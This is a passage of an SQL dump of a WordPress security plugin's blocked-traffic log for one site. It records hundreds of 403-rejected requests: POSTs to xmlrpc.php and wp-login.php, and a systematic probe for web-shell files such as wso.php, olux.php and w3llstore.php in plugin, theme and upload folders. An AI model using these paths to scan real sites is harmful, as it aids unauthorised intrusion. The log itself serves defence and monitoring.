INSERT INTO `cerber_traffic` VALUES ('152.89.196.13',2556019725,'','https://cteisys.com/wp-admin/accesson.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','PpF0xt1IuekvHb3D6qg7JX4o',0,1663810695.3119,11698,'','GET',403,0,700,0,1,'',0),('90.156.169.12',1520216332,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','RQz48Zeao09klfLwqxnJSv6b',0,1663842233.6247,13924,'','POST',403,0,515,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/plugins/contactmini.php','','{\"1\":\"\"}','kceC8Af0PFml7Rp4JTiSdwun',0,1663841695.1997,296,'','GET',403,0,700,0,1,'',0),('81.68.87.46',1363433262,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','y4gTZpi6sMLE0Rj9Y3VtfXOa',0,1663841768.1063,1460,'','POST',403,0,515,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/plugins/contact/shell.php','','{\"1\":\"\"}','V1eg6unbE4lzmqBrkXwHhRdy',0,1663841694.3593,365,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/plugins/contact/wp-activate.php','','{\"1\":\"\"}','LZT79UhqCVPBIjxwbpmkfQF5',0,1663841693.5229,328,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/plugins/contact/olux.php','','{\"1\":\"\"}','IHSVkU25zbPnJe7c9fFqr4Qv',0,1663841692.7295,288,'','GET',403,0,700,0,1,'',0),('95.217.184.77',1608104013,'','https://cteisys.com/wp-includes/shell20211028.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','6fHOtnrMwcKldsJ4F2hokvD8',0,1663816912.0560,594,'','GET',403,0,700,0,1,'',0),('95.217.184.77',1608104013,'','http://cteisys.com/wp-includes/shell20211028.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','jTtnmih2HWdKX4G7DzFx0lwO',0,1663816907.9447,319,'','GET',403,0,700,0,1,'',0),('95.217.184.77',1608104013,'','https://cteisys.com/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','wJDWATPILm2rXHsi6E7ulQce',0,1663816903.3097,342,'','GET',403,0,700,0,1,'',0),('95.217.184.77',1608104013,'','http://cteisys.com/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','9V8eD6w3SZPCLrTEXhRBQvHb',0,1663816898.6316,1975,'','GET',403,0,700,0,1,'',0),('103.226.251.11',1742928651,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','wOrvbFUqDE7SdtKe51TXf2ki',0,1663816210.2257,742,'','POST',403,0,600,0,1,'',0),('103.226.251.11',1742928651,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','c0hSjxdNXK6ArRzgYsy7o1pn',0,1663816207.3282,760,'','POST',403,0,600,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/plugins/contact/w3llstore.php','','{\"1\":\"\"}','KmNTuGkEYzgdbWFphXMIL0iB',0,1663841691.1223,320,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/plugins/contact/wp-email.php','','{\"1\":\"\"}','um43YjNDU2TWs1Hv0l9fbGqx',0,1663841691.9449,297,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/plugins/contact/wso2.php','','{\"1\":\"\"}','c7D12q0prHlWbOIPfny6G5Lz',0,1663841690.3496,297,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/plugins/contact/wso.php','','{\"1\":\"\"}','ltW510HQjiLUqdygKfP6Nrzh',0,1663841689.5456,342,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/plugins/contact/wp-ver.php','','{\"1\":\"\"}','VHsITUjt4FiwbPNmgkpe8AKO',0,1663841688.7771,281,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/plugins/contact/wp-class.php','','{\"1\":\"\"}','3GxyaRhClbrwgzHo7OvcS8X5',0,1663841688.0386,286,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/uploads/shell.php','','{\"1\":\"\"}','kWzY7bAQwixJeBKmrMvjtD8P',0,1663841686.4583,314,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/uploadsmini.php','','{\"1\":\"\"}','02w15uJObpkc6EesQvh7NFWA',0,1663841687.2443,324,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/uploads/wp-activate.php','','{\"1\":\"\"}','81EtlCIar5dhSuzMJjRFYny0',0,1663841685.6724,291,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/uploads/wp-email.php','','{\"1\":\"\"}','EdexlDtOIA97YwPSrkbNFivm',0,1663841684.1393,288,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/uploads/olux.php','','{\"1\":\"\"}','oSbAmluqFLMYnhrWDQXNRO40',0,1663841684.8780,288,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/uploads/w3llstore.php','','{\"1\":\"\"}','S3kqKEHOf5bzTuyZAL0roYFn',0,1663841683.2734,395,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/uploads/wso.php','','{\"1\":\"\"}','DKhMq1564wsAJU3Suy9ZHvgN',0,1663841681.7036,269,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/uploads/wso2.php','','{\"1\":\"\"}','LJnt1OVfIpuDjlP85UEAYGmo',0,1663841682.4535,331,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/uploads/wp-ver.php','','{\"1\":\"\"}','Xjb8JtgDoPBqfhSzQ49a2vH6',0,1663841680.9429,285,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/themesmini.php','','{\"1\":\"\"}','6CoDH7PjOsfMzLATrp49cvmQ',0,1663841679.3593,307,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/uploads/wp-class.php','','{\"1\":\"\"}','tDvckUf0T2V3I6nKQBzG7SyW',0,1663841680.1299,336,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/themes/shell.php','','{\"1\":\"\"}','2NuQR4alEX5DkJGOsmzqFTBp',0,1663841678.5810,326,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/themes/wp-activate.php','','{\"1\":\"\"}','Lxm87nejEMutC2UFqpTJGWv6',0,1663841677.7928,303,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/themes/olux.php','','{\"1\":\"\"}','0Pfa7LZyhrvRTlqgmMdx9jBV',0,1663841677.0145,299,'','GET',403,0,700,0,1,'',0),('203.118.155.133',3413547909,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','59rN17RXeJMsIdCxvQy2nLmk',0,1663826096.1247,6924,'','POST',403,0,515,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/themes/w3llstore.php','','{\"1\":\"\"}','YQ2jWc9vy3GhDBXsbfeFtJ7V',0,1663841675.4139,325,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/themes/wp-email.php','','{\"1\":\"\"}','5TtkQvumqwObzIXKBLE7Zog8',0,1663841676.2211,302,'','GET',403,0,700,0,1,'',0),('161.97.100.231',2707514599,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','3PIH8W4ia9shlKpr5XNBRVwb',0,1663825678.2506,18638,'','POST',403,0,515,0,1,'',0),('114.132.201.19',1921304851,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','r5nzeApbasOGIuk3S4Rcx60J',0,1663825766.9367,1545,'','POST',403,0,515,0,1,'',0),('209.141.46.253',3515690749,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.75.14 (KHTML, like Gecko) Version\\/7.0.3 Safari\\/537.75.14\"}','f1lR0AUiSd7BJE9hqHNyoGKL',0,1663825884.0712,615,'','POST',403,0,600,0,1,'',0),('64.42.179.43',1076540203,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','jghlJ3UZd4FyumXI1bD8QeGE',0,1663820214.5023,2493,'','POST',403,0,515,0,1,'',0),('41.93.82.7',693981703,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','fCnLvc4KYBVRZTqxw3SQUkDH',0,1663825320.3467,1206,'','POST',403,0,515,0,1,'',0),('46.183.216.163',783800483,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','7xlARInaZsvW1Jg6it85o3cM',0,1663819341.0876,2583,'','POST',403,0,515,0,1,'',0),('130.61.143.194',2185072578,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','uV4GgfEPIp2zCNi9615wrksq',0,1663825222.2096,1820,'','POST',403,0,515,0,1,'',0),('62.90.101.113',1046111601,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','lUAOtMivTGNko8sR7xKyYaQW',0,1663824843.6443,18686,'','POST',403,0,515,0,1,'',0),('139.196.152.3',2344916995,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','axVwhvKILuDfCJ0NmkO1gbEM',0,1663824368.3014,1653,'','POST',403,0,515,0,1,'',0),('93.113.111.193',1567715265,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','BUkzyC3dPRpKriomejHJAx6w',0,1663824270.3786,19294,'','POST',403,0,515,0,1,'',0),('37.46.128.180',623804596,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','wOtC80dDAUQ3rFc6JqZmk4Vn',0,1663823893.3807,11789,'','POST',403,0,515,0,1,'',0),('162.241.120.248',2733734136,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','M1zcEZA9xkYWso7ndFwNlOe3',0,1663823401.3160,8988,'','POST',403,0,515,0,1,'',0),('162.215.217.77',2732054861,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','NSzos7vwU4gr5QdLG86qJtIM',0,1663822931.2153,555,'','POST',403,0,515,0,1,'',0),('37.120.210.219',628675291,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','SJyd4EwAo6l7RtXu8f39LVqz',0,1663822905.8713,1440,'','POST',403,0,515,0,1,'',0),('119.18.54.14',1997682190,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','w6CuBWFXZ3lsAY2gopebLfEN',0,1663822842.1093,19527,'','POST',403,0,515,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/themes/wso.php','','{\"1\":\"\"}','xRzU49DQBb5k2vdJIrf3wjyK',0,1663841673.8256,297,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/themes/wso2.php','','{\"1\":\"\"}','9pBtc4x5lo7ZMXGq1fDOAC60',0,1663841674.5979,327,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/themes/wp-ver.php','','{\"1\":\"\"}','HCq3AozundXWIBxSRFpGehkP',0,1663841673.0413,311,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/themes/wp-class.php','','{\"1\":\"\"}','FnSCVK2I0xU8AkE45LbHfqNo',0,1663841672.2642,298,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/plugins/shell.php','','{\"1\":\"\"}','YloXE6UDkxSrIVsLhb1nitBA',0,1663841670.6848,315,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/pluginsmini.php','','{\"1\":\"\"}','rgS6XdiKwaoxMyh7PkvfYDn9',0,1663841671.4917,310,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/plugins/wp-activate.php','','{\"1\":\"\"}','qXhe45aBK0LjCf8VQn3FJtb9',0,1663841669.9097,289,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/plugins/wp-email.php','','{\"1\":\"\"}','lwGNZxM9XbPKsuRacCkAL8ni',0,1663841668.3033,291,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/plugins/olux.php','','{\"1\":\"\"}','erYqGAWaICH0QDduMcRk48NF',0,1663841669.0946,306,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/plugins/wso2.php','','{\"1\":\"\"}','WrEKOw9lZyvMDgRVBXcUuIxt',0,1663841666.6984,308,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/plugins/w3llstore.php','','{\"1\":\"\"}','XLyGpKEMSHlOtP7qjbDuUWxV',0,1663841667.4890,319,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/plugins/wso.php','','{\"1\":\"\"}','xD1OnoU8Ek0ZF9wJzWYTh6At',0,1663841665.9178,304,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/plugins/wp-ver.php','','{\"1\":\"\"}','M6zEY0RZeT2oUKntAN9x4s8v',0,1663841665.0636,359,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/plugins/wp-class.php','','{\"1\":\"\"}','q8bhpo0agvQLS2N3tTzYJwEk',0,1663841664.3033,290,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-includes/css/shell.php','','{\"1\":\"\"}','dky9VmqaJDpOj1Cr4AMuigRf',0,1663841662.7568,305,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-includes/cssmini.php','','{\"1\":\"\"}','K1NORIMlYTm3ZdnJiejvUog7',0,1663841663.5328,289,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-includes/css/wp-activate.php','','{\"1\":\"\"}','HymYSJXnb6Bh3WZz8IikUT79',0,1663841661.9903,292,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-includes/css/wp-email.php','','{\"1\":\"\"}','KIj5NxcBSH2XkDVY3istWP7h',0,1663841660.3795,341,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-includes/css/olux.php','','{\"1\":\"\"}','RpriG34zcvI7LHqj1OdgZyou',0,1663841661.1981,305,'','GET',403,0,700,0,1,'',0),('107.180.103.185',1806985145,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','w2ZPLlcmMxDokHRTAnjXWUqG',0,1663841637.9171,3074,'','POST',403,0,515,0,1,'',0),('152.89.196.13',2556019725,'','https://cteisys.com/wp-temp-ali.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','bXBhoaTz7f2mFHWsAMRSvQik',0,1663829949.7261,1020,'','POST',403,0,700,0,1,'',0),('67.205.143.236',1137545196,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','X46LV0A73QdkOzo5bpNiqSyR',0,1663829893.8623,19583,'','POST',403,0,515,0,1,'',0),('124.158.12.149',2090732693,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','eNRUI0C3fw8rQOxayYB9kVAi',0,1663829556.7319,8964,'','POST',403,0,515,0,1,'',0),('151.106.35.235',2540315627,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','jBI9756lm1fUrXvPzYE0ykLT',0,1663829474.8263,19089,'','POST',403,0,515,0,1,'',0),('81.68.87.46',1363433262,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','8Fz1ZqR3cO6LGflyXYjd0mpH',0,1663829134.7673,18543,'','POST',403,0,515,0,1,'',0),('35.211.94.153',601054873,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Y7qy93bvhOUEJXWmBDVoIAQT',0,1663828320.0117,1442,'','POST',403,0,515,0,1,'',0),('192.210.196.65',3235038273,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','wo60XG2UjW1DqvOZB4VmncbI',0,1663828644.2053,18281,'','POST',403,0,515,0,1,'',0),('162.144.49.214',2727358934,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','GIqrnUTLKWFeADiBoSCYMvNf',0,1663828241.0904,20446,'','POST',403,0,515,0,1,'',0),('97.79.239.127',1632628607,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','DUxtgHZASIQXEFKcL1e9bplG',0,1663827902.6284,2744,'','POST',403,0,515,0,1,'',0),('128.199.60.194',2160540866,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','G6YpMvh1oKP2wuctFLjxWVHl',0,1663827800.3107,18795,'','POST',403,0,515,0,1,'',0),('8.210.102.36',148006436,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','IDc08ZHqFQCVT4zMi5AEwdRj',0,1663827370.0422,18505,'','POST',403,0,515,0,1,'',0),('103.121.90.150',1736006294,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','LGb1jy6qDzUl9MAJuYpfQNix',0,1663827043.8732,9246,'','POST',403,0,515,0,1,'',0),('144.126.140.17',2424212497,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','OHjYGIPvxySD3FKlBguE15t9',0,1663826955.1817,21819,'','POST',403,0,515,0,1,'',0),('35.194.233.240',599976432,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','TErQ3MyRiJKHXjmhSCNxftbq',0,1663826616.0516,1219,'','POST',403,0,515,0,1,'',0),('185.104.44.128',3110612096,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','OpWvkGE612o5LKaiAzh9lZPN',0,1663826528.7937,18972,'','POST',403,0,515,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-adminmini.php','','{\"1\":\"\"}','pXQSNMD2kYFr80WPw9liR6ZV',0,1663841637.5071,692,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-content/wp-class.php','','{\"1\":\"\"}','tvz6SWOsU89NJXwkpBDCGLKh',0,1663841638.8157,711,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-admin/shell.php','','{\"1\":\"\"}','BYay9DjlXhMoJZEI1m0Qku2p',0,1663841636.6794,299,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-admin/olux.php','','{\"1\":\"\"}','OouYpWVrfZ0UyqBl1tIJNTQv',0,1663841634.9252,363,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-admin/wp-activate.php','','{\"1\":\"\"}','PN0Bq9Ae84wGmRCEiuXQbtz2',0,1663841635.7958,418,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-admin/w3llstore.php','','{\"1\":\"\"}','9Lx0YsVlH87Oq6JoGvf3WEDk',0,1663841633.3751,300,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-admin/wp-email.php','','{\"1\":\"\"}','s85Sv72kYAtWraQhXezCTq0V',0,1663841634.1429,309,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-admin/wso2.php','','{\"1\":\"\"}','6MexPIp5Z7gjEz9hk0FLlbBA',0,1663841632.5757,297,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-admin/wp-ver.php','','{\"1\":\"\"}','NIAFnROEjBKT4buqfVwgsUMk',0,1663841630.9275,313,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-admin/wso.php','','{\"1\":\"\"}','lBszeMLPGEoDpCh5tJ1O6FSa',0,1663841631.7360,341,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/wp-admin/wp-class.php','','{\"1\":\"\"}','gzbtP18JMcLlOSxeHIYviprC',0,1663841630.1056,313,'','GET',403,0,700,0,1,'',0),('176.109.189.170',2959981994,'','http://cteisys.com/shell.php','','{\"1\":\"\"}','V3YlMNRjuGSUiHPDtCfK54zF',0,1663833847.5115,299,'','GET',403,0,700,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com/mini.php','','{\"1\":\"\"}','CkrEJfiDdBwZG3j9Y5v8OQ1H',0,1663841629.2467,371,'','GET',403,0,700,0,1,'',0),('207.55.255.20',3476553492,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','mbZpL5jqBHf71SMacu4wJU8d',0,1663833149.5720,1325,'','POST',403,0,515,0,1,'',0),('47.106.201.134',795527558,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','vb5Kx0mVcEyAFiau9qlzkY4U',0,1663832757.0247,1388,'','POST',403,0,515,0,1,'',0),('51.79.241.19',860877075,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','gZfUmyxeHtPilQTE6bouO1Rr',0,1663832278.6959,1505,'','POST',403,0,515,0,1,'',0),('128.199.108.205',2160553165,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','VkrmAHLhpPjDBdFQE1JGsT8X',0,1663832638.2573,18692,'','POST',403,0,515,0,1,'',0),('162.241.120.248',2733734136,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','TIi8wf7rJGkF5nvBtqAsCMZV',0,1663831335.0674,1253,'','POST',403,0,515,0,1,'',0),('35.213.170.208',601205456,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','B6Fn54qiTztDHPcWgehjsvxy',0,1663832155.1650,18881,'','POST',403,0,515,0,1,'',0),('195.225.76.130',3286322306,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','zxMgKpdP1lsN4GJwcREkemvA',0,1663831232.5130,1497,'','POST',403,0,515,0,1,'',0),('103.90.232.106',1734010986,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','coZi6TheJIpwPSFqyz8x7GR3',0,1663830767.8898,1854,'','POST',403,0,515,0,1,'',0),('132.145.39.16',2224105232,'','http://cteisys.com//shell.php','','{\"1\":\"\"}','luPzWsLYJmMtXGVrOxeA5KaH',0,1663841628.4313,355,'','GET',403,0,700,0,1,'',0),('152.89.196.13',2556019725,'','https://cteisys.com/wp-post.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','tUZ1SPv6AwMGx5ikJCRH7Brs',0,1663837031.3009,1343,'','GET',403,0,700,0,1,'',0),('51.79.241.19',860877075,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 